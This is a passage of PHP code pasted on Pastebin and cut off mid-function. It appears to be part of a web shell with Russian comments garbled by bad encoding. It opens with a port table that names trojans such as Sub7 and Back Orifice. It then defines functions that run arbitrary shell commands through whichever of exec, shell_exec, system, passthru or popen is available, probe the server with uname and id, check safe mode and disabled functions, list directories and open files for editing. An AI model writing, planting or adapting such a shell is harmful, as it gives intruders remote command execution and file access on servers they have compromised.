  440. $port[6670] = "VocalTec Internet Phone, DeepThroat";
  441. $port[6699] = "napster";
  442. $port[6776] = "Sub7";
  443. $port[6970] = "RTP";
  444. $port[7007] = "MSBD, Windows Media encoder";
  445. $port[7070] = "RealServer/QuickTime";
  446. $port[7777] = "cbt";
  447. $port[7778] = "Unreal";
  448. $port[7648] = "CU-SeeMe";
  449. $port[7649] = "CU-SeeMe";
  450. $port[8000] = "iRDMI/Shoutcast Server";
  451. $port[8010] = "WinGate 2.1";
  452. $port[8080] = "HTTP";
  453. $port[8181] = "HTTP";
  454. $port[8383] = "IMail WWW";
  455. $port[8875] = "napster";
  456. $port[8888] = "napster";
  457. $port[8889] = "Desktop Data TCP 1";
  458. $port[8890] = "Desktop Data TCP 2";
  459. $port[8891] = "Desktop Data TCP 3: NESS application";
  460. $port[8892] = "Desktop Data TCP 4: FARM product";
  461. $port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
  462. $port[8894] = "Desktop Data TCP 6: COAL application";
  463. $port[9000] = "CSlistener";
  464. $port[10008] = "cheese worm";
  465. $port[11371] = "PGP 5 Keyserver";
  466. $port[13223] = "PowWow";
  467. $port[13224] = "PowWow";
  468. $port[14237] = "Palm";
  469. $port[14238] = "Palm";
  470. $port[18888] = "LiquidAudio";
  471. $port[21157] = "Activision";
  472. $port[22555] = "Vocaltec Web Conference";
  473. $port[23213] = "PowWow";
  474. $port[23214] = "PowWow";
  475. $port[23456] = "EvilFTP";
  476. $port[26000] = "Quake";
  477. $port[27001] = "QuakeWorld";
  478. $port[27010] = "Half-Life";
  479. $port[27015] = "Half-Life";
  480. $port[27960] = "QuakeIII";
  481. $port[30029] = "AOL Admin";
  482. $port[31337] = "Back Orifice";
  483. $port[32777] = "rpc.walld";
  484. $port[45000] = "Cisco NetRanger postofficed";
  485. $port[32773] = "rpc bserverd";
  486. $port[32776] = "rpc.spray";
  487. $port[32779] = "rpc.cmsd";
  488. $port[38036] = "timestep";
  489. $port[40193] = "Novell";
  490. $port[41524] = "arcserve discovery";
  491. ////////////////////////////////////////////////////////////////////////////////
  492. ////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
  493. ///////////////////////////////////////////////////////////////////////////////
  494. function rep_char($ch,$count) //Ïîâòîðåíèå ñèìâîëà
  495. {
  496. $res="";
  497. for($i=0; $i<=$count; ++$i){
  498. $res.=$ch."";
  499. }
  500. return $res;
  501. }
  502. function ex($comd) //Âûïîëíåíèå êîìàíäû
  503. {
  504. $res = '';
  505. if (!empty($comd)){
  506. if(function_exists('exec')){
  507. exec($comd,$res);
  508. $res=implode("\n",$res);
  509. }elseif(function_exists('shell_exec')){
  510. $res=shell_exec($comd);
  511. }elseif(function_exists('system')){
  512. ob_start();
  513. system($comd);
  514. $res=ob_get_contents();
  515. ob_end_clean();
  516. }elseif(function_exists('passthru')){
  517. ob_start();
  518. passthru($comd);
  519. $res=ob_get_contents();
  520. ob_end_clean();
  521. }elseif(is_resource($f=popen($comd,"r"))){
  522. $res = "";
  523. while(!feof($f)) { $res.=fread($f,1024); }
  524. pclose($f);
  525. }
  526. }
  527. return $res;
  528. }
  529. function sysinfo() //Âûâîä SYSINFO
  530. {
  531. global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
  532. echo("<b><font face=Verdana size=2> System information:<br><font size=-2>
  533. <hr>");
  534. echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
  535. ("Safe Mode: </b><font color=red>OFF</font><b> "));
  536. $row_dis_func=explode(', ',$dis_func);
  537. echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
  538. echo ("MySQL: </b>");
  539. if($mysql_stat){
  540. echo "<font color=green>ON </font><b>";
  541. }
  542. else {
  543. echo "<font color=red>OFF </font><b>";
  544. }
  545. echo "cURL: </b>";
  546. if($curl_on){
  547. echo "<font color=green>ON</font><b><br>";
  548. }else
  549. echo "<font color=red>OFF</font><b><br>";
  550. if ($dis_func!=""){
  551. echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
  552. }
  553. $uname=ex('uname -a');
  554. echo "OS: </b><font color=blue>";
  555. if (empty($uname)){
  556. echo (php_uname()."</font><br><b>");
  557. }else
  558. echo $uname."</font><br><b>";
  559. $id = ex('id');
  560. echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
  561. echo "id: </b><font color=blue>";
  562. if (!empty($id)){
  563. echo $id."</font><br><b>";
  564. }else
  565. echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
  566. "</font><br><b>";
  567. echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
  568. if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
  569. echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
  570. }
  571. echo "<hr size=3 color=black>";
  572. echo "</font></font>";
  573. }
  574. function read_dir($dir) //÷èòàåì ïàïêó
  575. {
  576. $d=opendir($dir);
  577. $i=0;
  578. while($r=readdir($d)){
  579. $res[$i]=$r;
  580. $i++;
  581. }
  582. return $res;
  583. }
  584. function permissions($mode,$file) { //îïðåäåëåíèå ñâîéñòâ
  585. $type=filetype($file);
  586. $perms=$type[0];
  587. $perms.=($mode & 00400) ? "r" : "-";
  588. $perms.=($mode & 00200) ? "w" : "-";
  589. $perms.=($mode & 00100) ? "x" : "-";
  590. $perms.=($mode & 00040) ? "r" : "-";
  591. $perms.=($mode & 00020) ? "w" : "-";
  592. $perms.=($mode & 00010) ? "x" : "-";
  593. $perms.=($mode & 00004) ? "r" : "-";
  594. $perms.=($mode & 00002) ? "w" : "-";
  595. $perms.=($mode & 00001) ? "x" : "-";
  596. $perms.="(".$mode.")";
  597. return $perms;
  598. }
  599. function open_file($fil, $m, $d) //Îòêðûòü ôàéë
  600. {
  601. if (!($fp=fopen($fil,$m))) {
  602. $res="Error opening file!\n";
  603. }else{
  604. ob_start();
  605. readfile($fil);
  606. $res=ob_get_contents();
  607. ob_end_clean();
  608. if (!(fclose($fp))){
  609. $res="ERROR CLOSE";
  610. }
  611. }
  612. echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
  613. echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
  614. echo "<table BORDER=1 align=center>";
  615. echo "<tr><td alling=center><b> ".$fil." </b></td></tr>";
  616. echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
  617. echo $res;
  618. echo "
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!